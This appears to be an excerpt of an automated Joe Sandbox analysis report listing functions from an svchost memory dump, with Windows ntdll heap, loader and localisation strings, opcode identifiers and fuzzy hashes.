                                                                                                              • Instruction ID: 60c080259fa0401ee06547fdf5d6674290f1204c50e252b418978c977caf1ab0
                                                                                                              • Opcode Fuzzy Hash: b6ff42e5fd92557154d1c4e0664e1d50b23221db3ccdf2954e1393a1782a96f5
                                                                                                              • Instruction Fuzzy Hash: D4F1CD35A04255EFCB25DF6EC440BAAFBF5FF09708F0880B9E4859B652C774A945CB90
                                                                                                              Function 03BC9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                              • API String ID: 0-3063724069
                                                                                                              • Opcode ID: 8fa5d623424304cc352dcaa7965875021da7f6e2583768de9f782b0af6409a78
                                                                                                              • Instruction ID: 4b0a216ae4ba08a85d2e99dc8b9dfa80b60098e2fcec3b718ebcd3ec01647c55
                                                                                                              • Opcode Fuzzy Hash: 8fa5d623424304cc352dcaa7965875021da7f6e2583768de9f782b0af6409a78
                                                                                                              • Instruction Fuzzy Hash: 03D1C172818395AFEB31DE64C841BABB7E8EF8471CF4449BDFA949B150D770C9048B92
                                                                                                              Function 03BE0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              • API String ID: 0-1700792311
                                                                                                              • Opcode ID: 57dc45a660a487ef464f7af2756b94a27982ff96340423e1a676ad5d9d829ce2
                                                                                                              • Instruction ID: e9ea4efd5451ef9f79f040cb0b83f653eb085115f07d9da874ba8af9194c456c
                                                                                                              • Opcode Fuzzy Hash: 57dc45a660a487ef464f7af2756b94a27982ff96340423e1a676ad5d9d829ce2
                                                                                                              • Instruction Fuzzy Hash: CDD1DE35500785DFCB26EF6AC440AADFBF1FF4A708F0881E9E4599B662C7B89941CB10
                                                                                                              Function 03B2D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 03B2D2C3
                                                                                                              • @, xrefs: 03B2D0FD
                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 03B2D146
                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 03B2D262
                                                                                                              • @, xrefs: 03B2D313
                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 03B2D196
                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 03B2D0CF
                                                                                                              • @, xrefs: 03B2D2AF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                              • API String ID: 0-1356375266
                                                                                                              • Opcode ID: 6722850cfec7b14b587430b0d5695405d79bf81dd9d069a138842634da2aabed
                                                                                                              • Instruction ID: 5ba5a00959c34da24125fe72fdc0a1f0f82d9ce1bdb0cb90ca038c6ecb8770d5
                                                                                                              • Opcode Fuzzy Hash: 6722850cfec7b14b587430b0d5695405d79bf81dd9d069a138842634da2aabed
                                                                                                              • Instruction Fuzzy Hash: CDA159759083559FD721DF24C484B5BBBE8FB84719F004EBEE5A89A240E774D908CB93
                                                                                                              Function 03B49EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • @, xrefs: 03B49EE7
                                                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 03B976EE
                                                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 03B976DD
                                                                                                              • Internal error check failed, xrefs: 03B97718, 03B978A9
                                                                                                              • minkernel\ntdll\sxsisol.cpp, xrefs: 03B97713, 03B978A4
                                                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03B97709
                                                                                                              • Status != STATUS_NOT_FOUND, xrefs: 03B9789A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                              • API String ID: 0-761764676
                                                                                                              • Opcode ID: 0dad2f7dcdc6657b078cb9e1649004e1fd5c8cc50c3860f83800f25760e7ee4e
                                                                                                              • Instruction ID: 70aa4671e6609de5bd1417e06f127b8634891968cdffbc071e1472cbebe8a45b
                                                                                                              • Opcode Fuzzy Hash: 0dad2f7dcdc6657b078cb9e1649004e1fd5c8cc50c3860f83800f25760e7ee4e
                                                                                                              • Instruction Fuzzy Hash: F0127F749002159FDF24CF68C881AAEB7F4FF48718F1880FAE845EB251E734A851DB65
                                                                                                              Function 03B3EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              • API String ID: 0-1109411897
                                                                                                              • Opcode ID: 71bd5b455930b0685af5e8b91f57286f6e038d7dbe676e91865ab8ba93572fb0
                                                                                                              • Instruction ID: a8d1bde3efc71d757aef406c07a21d989204762f8b0aa6abfc9a48fdb80caf27
                                                                                                              • Opcode Fuzzy Hash: 71bd5b455930b0685af5e8b91f57286f6e038d7dbe676e91865ab8ba93572fb0
                                                                                                              • Instruction Fuzzy Hash: 22A21875E056298BDF64DF19C8987A9B7B5EF8A308F1442FAD80DA7250DB349E85CF00
                                                                                                              Function 03B2F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-523794902
                                                                                                              • Opcode ID: fa8503d7341bb030d12bf8375059003fd1a53f9e555a43da729fb218beb02dc6
                                                                                                              • Instruction ID: e919496d26f46be7e8ec3539e0a6158ecf80b4fd119a9e8ef6b451fc0928fbf6
                                                                                                              • Opcode Fuzzy Hash: fa8503d7341bb030d12bf8375059003fd1a53f9e555a43da729fb218beb02dc6
                                                                                                              • Instruction Fuzzy Hash: 4842ED356083919FC715EF28C484B2AFBE5FF89608F084AFDE4998B291DB34D945CB52
                                                                                                              Function 03B3ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                              • API String ID: 0-4098886588
                                                                                                              • Opcode ID: af6f025b8e4a2eb37ade80e9ec88c2d0688b3cf3bd80cecb4dfd3a9a11b22597
                                                                                                              • Instruction ID: bec34b2e06520565f13bc9c284e2fa19ca68b3c579e4fdbfd8f0fe52e2e8358d
                                                                                                              • Opcode Fuzzy Hash: af6f025b8e4a2eb37ade80e9ec88c2d0688b3cf3bd80cecb4dfd3a9a11b22597
                                                                                                              • Instruction Fuzzy Hash: BA327D75E042798BEF21CB14C894BEEB7B9EF46348F1841FAE449A7254DB719E818F40
                                                                                                              Function 03B4B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                              • API String ID: 0-122214566
                                                                                                              • Opcode ID: 1b1a92f1bd686ae839efc7cd51c57b9b232396663b5a7e1a0de76119fcfae009
                                                                                                              • Instruction ID: 63712201166c15e52a1752bb872c736826f7177cfa4256588ad82393ad906665
                                                                                                              • Opcode Fuzzy Hash: 1b1a92f1bd686ae839efc7cd51c57b9b232396663b5a7e1a0de76119fcfae009
                                                                                                              • Instruction Fuzzy Hash: CDC14A31A00215ABDF24CB69C881B7EBB65EF8570CF1840F9EA85DF291E7B4D944E394
                                                                                                              Function 03B663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-792281065
                                                                                                              • Opcode ID: 61bbf8b0ba8750886e8142770006309c8ef7814d3844f2dd7a0c3f3ccc2b68ed
                                                                                                              • Instruction ID: 5a4497c4fe3b78dd0d6b41f400dc00d62e4e5a76e934c6b57521b1a53cf001b9
                                                                                                              • Opcode Fuzzy Hash: 61bbf8b0ba8750886e8142770006309c8ef7814d3844f2dd7a0c3f3ccc2b68ed
                                                                                                              • Instruction Fuzzy Hash: 21913834A14B549BDB34EF19D945BAEBBA4EB81B1CF1401F9E810AF382D7B89C01C790
                                                                                                              Function 03B6C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03BA8181, 03BA81F5
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 03BA81E5
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 03BA8170
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 03B6C6C3
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 03BA8177, 03BA81EB
                                                                                                              • LdrpInitializeProcess, xrefs: 03B6C6C4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: e19dde87b21ca55d4ae1164e84c7f1d0899a2126f072044894e05ffacc20bc80
                                                                                                              • Instruction ID: 3efba3f018186e416e56c273d2d7681be7b84a5cde8415b1a2f687184acd3a38
                                                                                                              • Opcode Fuzzy Hash: e19dde87b21ca55d4ae1164e84c7f1d0899a2126f072044894e05ffacc20bc80
                                                                                                              • Instruction Fuzzy Hash: A73119757457459FC210EF28DD45E2ABBE4EF84B18F0405F8F8859F291E660ED04C7A2
                                                                                                              Function 03BB9C32 Relevance: 6.8, Strings: 5, Instructions: 542COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                              • API String ID: 0-3127649145
                                                                                                              • Opcode ID: 15c21c2b6066225ac3a8c397ee178d016345728a1b16e6e4eb50371c3ff97c04
                                                                                                              • Instruction ID: 0ace595636fdab78fdf0f680ec05c5ab458d570859a0237f6ea13ba296bc8e0d
                                                                                                              • Opcode Fuzzy Hash: 15c21c2b6066225ac3a8c397ee178d016345728a1b16e6e4eb50371c3ff97c04
                                                                                                              • Instruction Fuzzy Hash: 44322A75A017199BDB61DF65CC88BEAB7F8FF44308F1045EAD509AB250DBB0AA84CF50
                                                                                                              Function 03B49950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                              • API String ID: 0-3393094623
                                                                                                              • Opcode ID: da0579b2a2ae90ebe0f3454009dc35bb3b83b70d896bd7f0ec83a923db9b55ee
                                                                                                              • Instruction ID: efcef19b02bbe75d836219a8723a5cf5b62fb0ff056e86b4acd5b5de0b876785
                                                                                                              • Opcode Fuzzy Hash: da0579b2a2ae90ebe0f3454009dc35bb3b83b70d896bd7f0ec83a923db9b55ee
                                                                                                              • Instruction Fuzzy Hash: D3024971508341CBDB20CF64C084B6BBBE5EF89748F4889BEE9998B251E770D844DB96
                                                                                                              Function 03B551EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • WindowsExcludedProcs, xrefs: 03B5522A
                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 03B55247
                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 03B5542B
                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 03B55352
                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 03B5527B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                              • API String ID: 0-258546922
                                                                                                              • Opcode ID: 7ae12949e0f07a686a5e33b803f80359022571162f9e21187543cf64090ae05f
                                                                                                              • Instruction ID: 03830339665f6707daffe79bb6d7fd3498aaa2e65a2719d566c33a348da949ca
                                                                                                              • Opcode Fuzzy Hash: 7ae12949e0f07a686a5e33b803f80359022571162f9e21187543cf64090ae05f
                                                                                                              • Instruction Fuzzy Hash: 5EF13076D00218EFCF25DF94D980A9EBBF9EF49654F1540BBE906AB250D7709E01CB90
                                                                                                              Function 03BB4F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                              • API String ID: 0-2518169356
                                                                                                              • Opcode ID: 105c59d8b1fba4f5bb62d25ee4f73083fd40055adccbb35d82adb2723a4352af
                                                                                                              • Instruction ID: 3a1a26ab6e4e142c60fad1bea6532022484836d0e34709d8b5db22fecc8288f1
                                                                                                              • Opcode Fuzzy Hash: 105c59d8b1fba4f5bb62d25ee4f73083fd40055adccbb35d82adb2723a4352af
                                                                                                              • Instruction Fuzzy Hash: 6D91C272A006199BCB20CF59C881AFEB7B4FF49318F5941BAE814E7350DBB5D901CB91
                                                                                                              Function 03B5D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1975516107
                                                                                                              • Opcode ID: 2de5429a6413c7e19788b554003fea1bb64026750f972b0966ad215e0ba95a78
                                                                                                              • Instruction ID: ee48622b09e6fa5e22943710a85464fd1e275b9e1cfa2ce6bbb8c284636f21c1
                                                                                                              • Opcode Fuzzy Hash: 2de5429a6413c7e19788b554003fea1bb64026750f972b0966ad215e0ba95a78
                                                                                                              • Instruction Fuzzy Hash: 3C51CE75A003459FDB24EFA4C5847AEBBB1FF4931CF1842BDE801AB291D774A981CB90
                                                                                                              Function 03B276B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                              • API String ID: 0-3061284088
                                                                                                              • Opcode ID: ba6c602476b83927d655c2b5735819279445d7e74b1ea371d68215e17bced262
                                                                                                              • Instruction ID: 55bcf7810b7f18036c21f20f861df7e2055b9fa4d6f01261bc401a992c2d0590
                                                                                                              • Opcode Fuzzy Hash: ba6c602476b83927d655c2b5735819279445d7e74b1ea371d68215e17bced262
                                                                                                              • Instruction Fuzzy Hash: 2F012836118260DED23AF329940AF56BFD4DB42A7CF1841FAE0148B9A2CEA89C80C560
                                                                                                              Function 03B470C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              • Opcode ID: aa81d27ab880b062927547df0a333e93a3345e7c947c6bfe0b03ad7202aa678d
                                                                                                              • Instruction ID: eca26e5f810ae19c3abf660a2e5e5298b7d046bb075832a71862b3ab5848dfd6
                                                                                                              • Opcode Fuzzy Hash: aa81d27ab880b062927547df0a333e93a3345e7c947c6bfe0b03ad7202aa678d
                                                                                                              • Instruction Fuzzy Hash: A913BA70A006599FDB25CF68C8807A9FBF1FF48308F1881E9D859EB381DB35A945DB94
                                                                                                              Function 03B41070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-3570731704
                                                                                                              • Opcode ID: dd465e36da4261358e6219abee6635d2fc379d708ba30b89975eaf74f0dd0883
                                                                                                              • Instruction ID: 344c621a094bb0b7ec19364c05266f498dc2cc353e55e5cf6b4f789f36d73b0a
                                                                                                              • Opcode Fuzzy Hash: dd465e36da4261358e6219abee6635d2fc379d708ba30b89975eaf74f0dd0883
                                                                                                              • Instruction Fuzzy Hash: 0B923675E00268CFEB25CF18C840BA9B7B5EF45318F0981FAD959AB291D7349E80CF55
                                                                                                              Function 03B4A840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03B97D03
                                                                                                              • SsHd, xrefs: 03B4A885
                                                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03B97D56
                                                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03B97D39
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                              • API String ID: 0-2905229100
                                                                                                              • Opcode ID: 32322194b05226199efeda06d0f656c2a7be2b8327fc6d23ed8e02d71b00938c
                                                                                                              • Instruction ID: 4972f343e18bb5594b48789d8aad7c7a3476f303198c5482d68c7b8936c67072
                                                                                                              • Opcode Fuzzy Hash: 32322194b05226199efeda06d0f656c2a7be2b8327fc6d23ed8e02d71b00938c
                                                                                                              • Instruction Fuzzy Hash: FED1AD75A402199BDF24CFA8C8C0AADF7B5FF48318F1940BAE845AB351D771D881DBA4
                                                                                                              Function 03B43D40 Relevance: 5.4, Strings: 3, Instructions: 1603COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                              • API String ID: 0-3178619729
                                                                                                              • Opcode ID: 8ee349d9e9aa0ff75bcc36a5b37a00629ef5cf54ee0073a65103157efcf1393c
                                                                                                              • Instruction ID: cded4bcc8107d19efe05481592fa20a16adcadb2502bdf02863750b1ec1ef4e7
                                                                                                              • Opcode Fuzzy Hash: 8ee349d9e9aa0ff75bcc36a5b37a00629ef5cf54ee0073a65103157efcf1393c
                                                                                                              • Instruction Fuzzy Hash: 26E2CE74A002159FDB28CF69C490BAAFBF1FF49308F1881E9D849AB385D734A855DF94
                                                                                                              Function 03B3A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 8694f6eff8897e55b335996faa2cc84f6daaabb6dc7b1d6ea16a41a91ed3642c
                                                                                                              • Instruction ID: 91f7ad75fb0eb2cd4f43cf56b063913047c9812cafc2996a6473dfbf8c7ac8eb
                                                                                                              • Opcode Fuzzy Hash: 8694f6eff8897e55b335996faa2cc84f6daaabb6dc7b1d6ea16a41a91ed3642c
                                                                                                              • Instruction Fuzzy Hash: 2BC177745083969FDB21CF28C044B6AB7F4FF86708F1449BAF8958B250E735DA49CB52
                                                                                                              Function 03B40C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 03B954D1, 03B95592
                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 03B954ED
                                                                                                              • HEAP: , xrefs: 03B954E0, 03B955A1
                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 03B955AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1488900482.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_3b00000_svchost.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                              • API String ID: 0-1657114761
